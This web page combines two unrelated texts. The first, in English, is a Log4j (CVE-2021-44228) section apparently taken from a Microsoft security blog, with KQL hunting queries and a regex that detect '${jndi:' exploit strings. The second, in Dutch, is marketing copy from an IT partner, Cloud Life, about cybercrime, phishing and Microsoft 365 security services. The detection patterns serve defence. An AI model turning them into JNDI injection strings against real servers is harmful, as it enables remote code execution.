Screenshot of Microsoft Defender for IoT intelligence update
Microsoft Defender for IoT now pushes new threat intelligence packages to cloud-connected sensors upon release, click here for more information. Starting with sensor version 10.3, users can automatically receive up-to-date threat intelligence packages through Microsoft Defender for IoT.
Working with automatic updates reduces operational effort and ensures greater security. Enable automatic updating on the Defender for IoT portal by onboarding your cloud-connected sensor with the toggle for Automatic Threat Intelligence Updates turned on. For more information about threat intelligence packages in Defender for IoT, please refer to the documentation.
Microsoft will continue to monitor this dynamic situation and will update this blog as new threat intelligence and detections/mitigations become available.
Advanced hunting
To locate possible exploitation activity, run the following queries.
Suspected exploitation of Log4j vulnerability
Look for exploitation of this vulnerability using known parameters in the malicious string. This query surfaces exploitation but may surface legitimate behavior in some environments. Run query
DeviceProcessEvents
| where ProcessCommandLine has_all('${jndi') and ProcessCommandLine has_any('ldap', 'ldaps', 'http', 'rmi', 'dns', 'iiop')
//Removing FPs
| where not(ProcessCommandLine has_any('stackstorm', 'homebrew'))
Regex to identify malicious exploit string
Look for the malicious string needed to exploit this vulnerability. Run query
DeviceProcessEvents
| where ProcessCommandLine matches regex @'(?i)\$\{jndi:(ldap|http|https|ldaps|dns|rmi|iiop):\/\/(\$\{([a-z]){1,20}:([a-z]){1,20}\})?(([a-zA-Z0-9]|-){2,100})?(\.([a-zA-Z0-9]|-){2,100})?\.([a-zA-Z0-9]|-){2,100}\.([a-z0-9]){2,20}(\/).*}'
or InitiatingProcessCommandLine matches regex @'(?i)\$\{jndi:(ldap|http|https|ldaps|dns|rmi|iiop):\/\/(\$\{([a-z]){1,20}:([a-z]){1,20}\})?(([a-zA-Z0-9]|-){2,100})?(\.([a-zA-Z0-9]|-){2,100})?\.([a-zA-Z0-9]|-){2,100}\.([a-z0-9]){2,20}(\/).*}'
Possible Malicious Indicators in Cloud Application Events
This query is designed to flag exploitation attempts for cases where the attacker is sending the crafted exploitation string using vectors such as User-Agent, Application or Account name. The hits returned from this query are most likely unsuccessful attempts, however the results can be useful to identity attackers’ details such as IP address, Payload string, Download URL, etc.
CloudAppEvents
| where Timestamp > datetime(“2021-12-09”)
| where UserAgent contains “jndi:”
or AccountDisplayName contains “jndi:”
or Application contains “jndi:”
or AdditionalFields contains “jndi:”
| project ActionType, ActivityType, Application, AccountDisplayName, IPAddress, UserAgent, AdditionalFields
Possible vulnerable applications via M365D Threat and Vulnerability Management
This query looks for possibly vulnerable applications using the affected Log4j component. Please triage the results to determine applications and programs that may need to be patched and updated. Run Query.
Surfacing possibly vulnerable devices using Advanced Hunting
Finding possible vulnerable applications and devices via software inventory
Customers can also surface possibly vulnerable devices via Threat and Vulnerability Management capability in Microsoft Defender for Endpoint as part of Microsoft 365 Defender. With endpoint discovery, unmanaged devices with this vulnerability are also surfaced so they can be onboarded and secured.
Surfacing possibly vulnerable devices using Software Inventory
This hunting query looks for possible attempts to exploit a remote code execution vulnerability in the Log4j component of Apache. Attackers may attempt to launch arbitrary code by passing specific commands to a server, which are then logged and executed by the Log4j component.
This query hunts through EXECVE syslog data generated by AUOMS to find instances of crypto currency miners being downloaded. It returns a table of suspicious command lines.
This hunting query looks in Azure Web Application Firewall data to find possible exploitation attempts for CVE-2021-44228 involving Log4j vulnerability.
This hunting query helps detect post-compromise suspicious shell scripts that attackers use for downloading and executing malicious files. This technique is often used by attackers and was recently used to exploit the vulnerability in Log4j component of Apache to evade detection and stay persistent or for more exploitation in the network.
This query alerts on a positive pattern match by Azure WAF for CVE-2021-44228 Log4j exploitation attempt. If possible, it then decodes the malicious command for further analysis.
This hunting query helps detect suspicious encoded Base64 obfuscated scripts that attackers use to encode payloads for downloading and executing malicious files. This technique is often used by attackers and was recently used to the Log4j vulnerability in order to evade detection and stay persistent in the network.
This query alerts on attempts to terminate processes related to security monitoring. Attackers often try to terminate such processes post-compromise as seen recently to exploit the CVE-2021-44228 vulnerability.
Nu we veel meer online zijn en op locatie werken, lijkt het wel alsof hackers nog beter hun best doen om in te breken bij mensen. Met de juiste Microsoft 365 onderdelen zorg je dat je zo goed mogelijk beschermd blijft tegen allerlei cyberaanvallen.
Dat cybercrime enorm gestegen is, is geen verrassing. Er zijn genoeg voorbeelden in de media geweest de afgelopen maanden. Neem bijvoorbeeld de hacks op Colonial Pipeline in de VS, Bol.com en de gemeente Hof van Twente, waarbij hackers servers vergrendelden en acht ton losgeld eiste.
Meer cybermisdrijven dan inbraken
Dit zijn slechts enkele bekende voorvallen, maar er worden dagelijks veel meer aanvallen uitgevoerd. Uit cijfers van de politie blijkt bijvoorbeeld dat in mei vorig jaar er vijf keer zoveel cybermisdrijven geregistreerd zijn dan in mei 2019. Daarmee werd ook gelijk een mijlpaal gepasseerd: voor het eerst werden er in een maand meer cybermisdrijven gemeld dan woninginbraken in Nederland! Bij de politie werden 1869 cybermisdrijven gemeld, terwijl er ‘maar’ 1344 inbraken geregistreerd werden. Een van de meest voorkomende vormen van cybercrime komt iedereen dagelijks tegen: phishing. Criminelen sturen een email of whatsappbericht met een vraag om te klikken op een link, vaak goed verpakt in een herkenbare e-mail van je werkgever of bank. Klik je op die link, dan is de kans groot dat criminelen je gegevens verzamelen om geld te stelen. Iedereen kan hiervan slachtoffer worden. Want sommige emails zijn moeilijk van echt te onderscheiden…
Hoe kun je je tegen cybercriminaliteit wapenen?
Om criminelen zo weinig mogelijk kans te geven om in te breken, zijn twee zaken belangrijk: bewustzijn en techniek. Veel mensen en organisaties denken nog steeds dat ze weinig of geen risico lopen. Of nog erger; ze accepteren het risico dat het gebeurt – tot dat het gebeurt. Maar iedereen loopt risico. Wees dus alert als je een e-mail of ander bericht krijgt van een afzender die je niet kent, of wel kent maar het verzoek vreemd lijkt. Niemand vindt het vervelend als ze een vraag ter verificatie krijgen… behalve de criminelen 😉. Als bedrijf is het dus goed om je medewerkers hier bewust van te maken!
Daarnaast zijn er steeds meer beveiligingstools die je beschermen tegen criminelen. Microsoft heeft zich de laatste jaren omgevormd tot security company met een investering van 1 miljard per jaar, en is inmiddels het grootste security bedrijf ter wereld. Bekende virussen en malware worden actief tegengehouden en mocht je per ongeluk toch op een phishing-link geklikt hebben, dan is de kans groot dat Microsoft de website op een zwarte lijst heeft geplaatst en de toegang geblokkeerd heeft. Ook bevat het Microsoft 365 platform verschillende onderdelen die je werkplek zo goed mogelijk beschermen. Die onderdelen zijn voor de meeste bedrijven toegankelijk, zonder dat ze het weten. Ze vallen namelijk onder de Microsoft licentie. Je hebt dus al veel tools in huis om jezelf en je medewerkers te beschermen tegen cybercriminelen.
Wij helpen je om die tools goed in te richten, zodat medewerkers veilig op hun werkplek kunnen werken, of dat nu op kantoor is of thuis. Wil je weten hoe wij je kunnen helpen met het inrichten van je beveiliging met Microsoft 365? Neem dan contact op.
Het mooie van werken in de Cloud, is dat je vanaf elke locatie kunt inloggen en dus bij je bestanden kunt. Maar daarbij moet je je wel beseffen dat je overal het risico loopt om data te lekken. Wij kunnen je de oplossingen leveren omdat zoveel mogelijk tegen te gaan. Maar zelf heb je dat ook in de hand.
Op kantoor is het heel gewoon; als je even van je plek afgaat, vergrendel je je laptop of computer. Niet omdat je je collega’s niet vertrouwt, maar omdat je er zeker van wilt zijn dat niemand bij jouw werk kan komen als je niet zelf in de buurt bent. Je werkt immers met gevoelige data, bijvoorbeeld patiëntgegevens of BSN-nummers.
Maar vergrendel je thuis ook je laptop, wanneer er mensen in huis zijn en je even naar de keuken loopt voor een kop koffie? Waarschijnlijk heb je hier nog nooit over nagedacht. Maar juist thuis of op locatie is de kans groot dat iemand – al dan niet bewust – toegang krijgt tot de gevoelige data. Nu zullen degenen bij jouw thuis hier niet zo snel iets mee doen, maar het is wel een risico. Bijvoorbeeld als je je laptop ook privé gebruikt. Je hebt zomaar een verkeerde link aangeklikt, een gevaarlijke website geopend of iets lokaal opgeslagen heb, dat eigenlijk niet mag.
Een veilige werkplek op locatie
Goede cybersecurity bestaat uit twee zaken: technische oplossingen én bewustzijn. Met de technische oplossingen helpen wij je graag. Wij hebben ons gespecialiseerd in cybersecurity en de oplossingen die Microsoft 365 daarvoor heeft. Als IT-partner zorgen we ervoor dat alle devices beveiligd worden, ook voor organisaties die met extra maatregelen rekening moeten houden als het gaat om het beveiligen van persoonsgegevens en het voorkomen van datalekken. Bijvoorbeeld door ervoor te zorgen dat gegevens uit de Microsoft Teams-chat niet gekopieerd kunnen worden in een internetbrowser. Met onze Cloud Security Scan geven we je inzicht in hoe jouw organisatie er voor staat op het gebied van security.
Maar het gaat dus ook om bewustzijn. Daar zijn we allemaal verantwoordelijk voor. Zorg er dus altijd voor dat als je van je werkplek afgaat, je scherm vergrendeld is. Ook thuis. Zorg dat alle software up to date is. Maak sterke wachtwoorden en gebruik multifactor authenticatie en kaart het ook aan bij je organisatie als dat niet goed geregeld is. Vertrouw je een email niet? Klik dan niet op de link, maar meld het. Wees alert!
Wil je meer weten over hoe wij Microsoft 365 inzetten om jouw werkplek zo veilig mogelijk te maken en wat je zelf allemaal kunt doen? Neem dan contact op.
Werken in de Cloud is tegenwoordig bijna vanzelfsprekend. Zeker nu remote werken een vast onderdeel van onze manier van werken lijkt te worden. Toch zijn er best wat vragen over werken in de Cloud. Met name als het om veiligheid gaat. Je wilt je niet druk hoeven te maken over een veilige werkplek. Dat is onze expertise. Daarom doen wij dat voor je.
Onze mensen zijn al jaren werkzaam in de ICT en hebben in 2018 Cloud Life opgericht, omdat ze klanten wilden helpen met alles wat Microsoft 365 te bieden had. Eén van onze klanten – een zorginstelling – was op dat moment op zoek naar goede securityoplossingen en wilde meer gaan doen met de Security addons van Microsoft. Toen we ons daarin gingen verdiepen, ging er een wereld voor ons open. Er zijn zoveel slimme mogelijkheden met de securityoplossingen! Al snel hadden we door dat daar onze passie lag en zijn we ons op security gaan specialiseren. Dat leidde ertoe dat wij die klant hebben gemigreerd en zij als eerste zorginstelling in Europa de security voor hun systemen volledig in de Microsoft Azure omgeving hebben draaien.
Gevoelige data moet veilig zijn
Nu doen we bij Cloud Life wat we het liefst doen: klanten adviseren over security en bieden we hun de beste oplossingen aan. Met onze Cloud Security Scan maken wij een rapport dat inzicht geeft hoe jouw organisatie ervoor staat op het gebied van security. Op basis daarvan kijken hoe we de security kunnen verbeteren. Het beschermen van (gevoelige) data staat daarbij voorop. Daarom hebben we samen met Microsoft verschillende oplossingen ontwikkeld, waardoor organisaties veilig kunnen communiceren via de mail én voldoen aan de regelgeving, zoals de NTA 7516. Zo hebben we zorginstellingen, provincies en gemeenten door het hele land geholpen bij het inrichten van hun veilige werkplek.
Mensen trainen is net zo belangrijk
Maar we zorgen er ook voor dat medewerkers veilig kunnen werken, zonder dat ze een ICT-opleiding nodig hebben om dat te kunnen. We helpen organisaties om hun medewerkers veilig te laten werken, onder meer met trainingen. Naast implementatieadvies en trainingen, zorgt Cloud Life ook voor het onderhoud en beheer. Door onze manier van werken, ‘getting things done’, zijn we binnen 2 jaar verkozen tot één van de zeven Managed partners van Microsoft Nederland en zijn daarnaast een van de meest succesvolle Gold Partners van Microsoft. En we zijn pas net begonnen.
Wil je niets missen over wat wij doen, hoe we jouw organisatie kunnen helpen met veilig werken in de Cloud en tips en tricks om veilig werken nog eenvoudiger te maken? Schrijf je dan in voor onze nieuwsbrief. Dan heb je de laatste artikelen als eerste in je mailbox.
Je wilt natuurlijk dat jouw organisatie de volle 100% veilig is, dit is helaas niet altijd mogelijk. Er vinden steeds vaker cyberaanvallen plaats die veel schade kunnen aanrichten. Een recent voorbeeld hiervan is het Hof van Twente. Je kunt er wel voor zorgen om het risico gehackt te worden, zo klein mogelijk te maken.
Hier onder beschrijven we met welke oplossingen je zo veel mogelijk hackers buiten de deur houdt.
Zorg voor een goed Microsoft Defender for Office 365 beleid. Hiermee maak je alle mail, document en koppelingen veilig binnen de hele Microsoft 365 omgeving.
Configureer Microsoft Defender for Identity. Dit de de cloud-based oplossing voor je on-premise Active Directoty.
Zorg ervoor dat medewerkers geen automatische email doorsturen (auto-forwarding).
Voorkom click-and-forget en creëer geen schijnveiligheid. Vaak is de wens bij organisaties om meer met veiligheid te willen doen. Helaas komt het voor dat eenmalig configuraties worden doorgevoerd en dit niet, noch de output hiervan, wordt bijgehouden. Schijnveiligheid is waar mogelijk nog gevaarlijker dan niets doen.
Cloud Life is de vertrouwde expert in Veilig Online Werken
Een veilige omgeving valt en staat met een goede inrichting én beheer hiervan. Wij kunnen jouw organisatie helpen om je te beschermen tegen cyberaanvallen en up-to-date te houden van alle laatste ontwikkelingen in het security landschap van Microsoft. Wij zijn de partner die meedenken en jouw organisatie veilig houdt.
Cloud Life is dé trusted partner van Microsoft op het gebied van cybersecurity, werk jij al veilig?
